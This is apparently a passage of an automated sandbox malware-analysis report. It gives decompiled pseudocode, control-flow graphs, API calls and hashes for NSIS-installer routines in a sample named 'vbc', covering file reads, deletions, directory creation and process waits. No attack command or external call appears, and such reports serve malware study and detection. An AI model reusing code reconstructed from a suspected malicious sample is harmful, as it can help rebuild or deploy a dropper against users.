                                                        control_flow_graph 576 403377-403384 577 4033a2-4033ab call 40347f 576->577 578 403386-40339c SetFilePointer 576->578 581 4033b1-4033c4 call 4061e1 577->581 582 403479-40347c 577->582 578->577 585 403469 581->585 586 4033ca-4033dd call 40347f 581->586 588 40346b-40346c 585->588 590 4033e3-4033e6 586->590 591 403477 586->591 588->582 592 403445-40344b 590->592 593 4033e8-4033eb 590->593 591->582 594 403450-403467 ReadFile 592->594 595 40344d 592->595 593->591 596 4033f1 593->596 594->585 597 40346e-403471 594->597 595->594 598 4033f6-403400 596->598 597->591 599 403402 598->599 600 403407-403419 call 4061e1 598->600 599->600 600->585 603 40341b-403422 call 406210 600->603 605 403427-403429 603->605 606 403441-403443 605->606 607 40342b-40343d 605->607 606->588 607->598 608 40343f 607->608 608->591
                                                        C-Code - Quality: 92%
                                                        			E00403377(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x7a8af8;
					 *0x79f734 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E0040347F(4);
				if(_t22 >= 0) {
					_t24 = E004061E1( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x79f734 =  *0x79f734 + 4;
						_t36 = E0040347F(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x79f734 =  *0x79f734 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E004061E1( *0x40a01c, 0x793730, _t28) == 0) {
											goto L18;
										}
										_t30 = E00406210(_a8, 0x793730, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x79f734 =  *0x79f734 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














                                                        0x0040337b
                                                        0x00403384
                                                        0x0040338d
                                                        0x00403391
                                                        0x0040339c
                                                        0x0040339c
                                                        0x004033a4
                                                        0x004033ab
                                                        0x004033bd
                                                        0x004033c4
                                                        0x00403469
                                                        0x00403469
                                                        0x00000000
                                                        0x004033ca
                                                        0x004033cd
                                                        0x004033d9
                                                        0x004033dd
                                                        0x00403477
                                                        0x00403477
                                                        0x004033e3
                                                        0x004033e6
                                                        0x00403445
                                                        0x0040344b
                                                        0x0040344d
                                                        0x0040344d
                                                        0x0040345f
                                                        0x00403467
                                                        0x0040346e
                                                        0x00403471
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004033e8
                                                        0x004033eb
                                                        0x00000000
                                                        0x004033f1
                                                        0x004033f6
                                                        0x004033fd
                                                        0x00403400
                                                        0x00403402
                                                        0x00403402
                                                        0x0040340f
                                                        0x00403419
                                                        0x00000000
                                                        0x00000000
                                                        0x00403422
                                                        0x00403429
                                                        0x00403441
                                                        0x0040346b
                                                        0x0040346b
                                                        0x0040342b
                                                        0x0040342b
                                                        0x0040342e
                                                        0x00403431
                                                        0x00403437
                                                        0x0040343d
                                                        0x00000000
                                                        0x0040343f
                                                        0x00000000
                                                        0x0040343f
                                                        0x0040343d
                                                        0x00000000
                                                        0x00403429
                                                        0x00000000
                                                        0x004033f6
                                                        0x004033eb
                                                        0x004033e6
                                                        0x004033dd
                                                        0x004033c4
                                                        0x00403479
                                                        0x0040347c

                                                        APIs
                                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 0040339C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID: 07y
                                                        • API String ID: 973152223-1660179758
                                                        • Opcode ID: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
                                                        • Instruction ID: 558639dd8831905cecc0235a21772d735375f1fafe9af626847c4dd8eee9aa20
                                                        • Opcode Fuzzy Hash: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
                                                        • Instruction Fuzzy Hash: 73319330201218FFDF129FA5ED85D9E3F68EB00359F10803AF905E9190D778DA51DBA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405D32 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 609 405d32-405d43 call 406139 612 405d73 609->612 613 405d45-405d4b 609->613 614 405d75-405d77 612->614 615 405d55 DeleteFileW 613->615 616 405d4d-405d53 RemoveDirectoryW 613->616 617 405d5b-405d5d 615->617 616->617 618 405d64-405d69 617->618 619 405d5f-405d62 617->619 618->612 620 405d6b-405d6d SetFileAttributesW 618->620 619->614 620->612
                                                        C-Code - Quality: 41%
                                                        			E00405D32(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406139(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                                                        0x00405d33
                                                        0x00405d3e
                                                        0x00405d43
                                                        0x00405d73
                                                        0x00000000
                                                        0x00405d73
                                                        0x00405d4a
                                                        0x00405d4b
                                                        0x00405d55
                                                        0x00405d4d
                                                        0x00405d4d
                                                        0x00405d4d
                                                        0x00405d5d
                                                        0x00405d69
                                                        0x00405d6d
                                                        0x00405d6d
                                                        0x00000000
                                                        0x00405d5f
                                                        0x00000000
                                                        0x00405d61

                                                        APIs
                                                          • Part of subcall function 00406139: GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
                                                          • Part of subcall function 00406139: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
                                                        • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F14), ref: 00405D4D
                                                        • DeleteFileW.KERNEL32(?,?,?,00000000,00405F14), ref: 00405D55
                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6D
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: File$Attributes$DeleteDirectoryRemove
                                                        • String ID:
                                                        • API String ID: 1655745494-0
                                                        • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                        • Instruction ID: 65d886778d981234f1bc095319bf1530848ff53bfe772b7143d7b60a17f83489
                                                        • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                        • Instruction Fuzzy Hash: E1E0E531204EA056C7106B35AD0CF5B2A98EF86314F05893FF592B10D0D77888078AAE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406AE6 Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 621 406ae6-406afe WaitForSingleObject 622 406b0e-406b10 621->622 623 406b00-406b0c call 406a77 WaitForSingleObject 622->623 624 406b12-406b25 GetExitCodeProcess 622->624 623->622
                                                        C-Code - Quality: 100%
                                                        			E00406AE6(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A77(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}





                                                        0x00406af7
                                                        0x00406b0e
                                                        0x00406b02
                                                        0x00406b0c
                                                        0x00406b0c
                                                        0x00406b19
                                                        0x00406b25

                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
                                                        • WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,00401F9F,?,?,?,?,?,?), ref: 00406B0C
                                                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: ObjectSingleWait$CodeExitProcess
                                                        • String ID:
                                                        • API String ID: 2567322000-0
                                                        • Opcode ID: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
                                                        • Instruction ID: 2c972b7a35bd62db52b15041da2731f4b89024a3c017fe3bef96d42d01d66162
                                                        • Opcode Fuzzy Hash: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
                                                        • Instruction Fuzzy Hash: 67E09271600218BBEB00AB54DD05E9E7F7EDB44700F110032F601F6190C6B1EE22DAA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00403C2B Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 627 403c2b-403c3a 628 403c46-403c4e 627->628 629 403c3c-403c3f CloseHandle 627->629 630 403c50-403c53 CloseHandle 628->630 631 403c5a-403c66 call 403c88 call 405d7a 628->631 629->628 630->631 635 403c6b-403c6c 631->635
                                                        C-Code - Quality: 100%
                                                        			E00403C2B() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1); // executed
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C88();
				_t4 = E00405D7A(_t11, 0x7b6000, 7); // executed
				return _t4;
			}







                                                        0x00403c2b
                                                        0x00403c3a
                                                        0x00403c3d
                                                        0x00403c3f
                                                        0x00403c3f
                                                        0x00403c46
                                                        0x00403c4e
                                                        0x00403c51
                                                        0x00403c53
                                                        0x00403c53
                                                        0x00403c53
                                                        0x00403c5a
                                                        0x00403c66
                                                        0x00403c6c

                                                        APIs
                                                        • CloseHandle.KERNELBASE(FFFFFFFF), ref: 00403C3D
                                                        • CloseHandle.KERNEL32(FFFFFFFF), ref: 00403C51
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C30
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 2962429428-4017390910
                                                        • Opcode ID: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
                                                        • Instruction ID: 4491f7c80fa00ae2087dec4a459748e9e372b7f9a3145cafecdefc003a92e639
                                                        • Opcode Fuzzy Hash: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
                                                        • Instruction Fuzzy Hash: F3E0863244471896D1347F7DAE4D9853B195F413327204326F178F20F0C7389AA74A99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 636 4015c1-4015d5 call 402da6 call 405fe8 641 401631-401634 636->641 642 4015d7-4015ea call 405f6a 636->642 644 401663-4022f6 call 401423 641->644 645 401636-401655 call 401423 call 40666e SetCurrentDirectoryW 641->645 649 401604-401607 call 405c1c 642->649 650 4015ec-4015ef 642->650 660 402c2a-402c39 644->660 661 40292e-402935 644->661 645->660 663 40165b-40165e 645->663 659 40160c-40160e 649->659 650->649 653 4015f1-4015f8 call 405c39 650->653 653->649 667 4015fa-4015fd call 405b9f 653->667 665 401610-401615 659->665 666 401627-40162f 659->666 661->660 663->660 669 401624 665->669 670 401617-401622 GetFileAttributesW 665->670 666->641 666->642 672 401602 667->672 669->666 670->666 670->669 672->659
                                                        C-Code - Quality: 86%
                                                        			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE8(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F6A(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C1C( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C39(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B9F( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040666E(0x7b4000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                        0x004015c1
                                                        0x004015c9
                                                        0x004015cc
                                                        0x004015d1
                                                        0x004015d5
                                                        0x004015d7
                                                        0x004015df
                                                        0x004015e1
                                                        0x004015e4
                                                        0x004015ea
                                                        0x00401604
                                                        0x00401607
                                                        0x004015ec
                                                        0x004015ec
                                                        0x004015ef
                                                        0x00000000
                                                        0x004015fa
                                                        0x004015fd
                                                        0x004015fd
                                                        0x004015ef
                                                        0x0040160e
                                                        0x00401615
                                                        0x00401624
                                                        0x00401624
                                                        0x00401617
                                                        0x0040161a
                                                        0x00401622
                                                        0x00000000
                                                        0x00000000
                                                        0x00401622
                                                        0x00401615
                                                        0x00401627
                                                        0x0040162b
                                                        0x0040162c
                                                        0x004015d7
                                                        0x00401634
                                                        0x00401663
                                                        0x004022f1
                                                        0x00401636
                                                        0x00401638
                                                        0x00401645
                                                        0x0040164d
                                                        0x00401655
                                                        0x0040165b
                                                        0x0040165b
                                                        0x00401655
                                                        0x00402c2d
                                                        0x00402c39

                                                        APIs
                                                          • Part of subcall function 00405FE8: CharNextW.USER32(?), ref: 00405FF6
                                                          • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
                                                          • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                          • Part of subcall function 00405B9F: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
                                                        • SetCurrentDirectoryW.KERNELBASE(?,007B4000,?,00000000,000000F0), ref: 0040164D
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                        • String ID:
                                                        • API String ID: 1892508949-0
                                                        • Opcode ID: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
                                                        • Instruction ID: 957f66bc23545469dbc724fd3d157a479205f5e7ec4e330cdfccc87aa14dd729
                                                        • Opcode Fuzzy Hash: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
                                                        • Instruction Fuzzy Hash: 3111E231408115EBCF217FA5CD4099E36A0EF15369B28493BFA01B22F1DA3E49829B5E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406045 Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 53%
                                                        			E00406045(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040666E(0x7a4790, _a4);
				_t21 = E00405FE8(0x7a4790);
				if(_t21 != 0) {
					E004068F5(_t21);
					if(( *0x7a8ab8 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x7a4790 >> 1;
						while(1) {
							_t11 = lstrlenW(0x7a4790);
							_push(0x7a4790);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E004069A4();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F89(0x7a4790);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F3D();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                                        0x00406051
                                                        0x0040605c
                                                        0x00406060
                                                        0x00406067
                                                        0x00406073
                                                        0x00406083
                                                        0x00406085
                                                        0x0040609d
                                                        0x0040609e
                                                        0x004060a5
                                                        0x004060a6
                                                        0x00000000
                                                        0x00000000
                                                        0x00406089
                                                        0x00406090
                                                        0x00406098
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406090
                                                        0x004060a8
                                                        0x004060ae
                                                        0x00000000
                                                        0x004060bc
                                                        0x00406075
                                                        0x0040607b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040607b
                                                        0x00406062
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
                                                          • Part of subcall function 00405FE8: CharNextW.USER32(?), ref: 00405FF6
                                                          • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
                                                          • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
                                                        • lstrlenW.KERNEL32(007A4790,00000000,007A4790,007A4790,7556D4C4,?,755513E0,00405D9A,?,7556D4C4,755513E0,00000000), ref: 0040609E
                                                        • GetFileAttributesW.KERNELBASE(007A4790,007A4790,007A4790,007A4790,007A4790,007A4790,00000000,007A4790,007A4790,7556D4C4,?,755513E0,00405D9A,?,7556D4C4,755513E0), ref: 004060AE
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                        • String ID:
                                                        • API String ID: 3248276644-0
                                                        • Opcode ID: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
                                                        • Instruction ID: 38ed1c6f7611cbdad0e8a1dc3f16fb44af04154f1bcb09577380b12bcb23f66f
                                                        • Opcode Fuzzy Hash: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
                                                        • Instruction Fuzzy Hash: 31F0282A148A5219D622B33A0D05ABF05458EC2354B0B063FFC53B12D1DF7C897385BF
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 69%
                                                        			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7a8ad0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
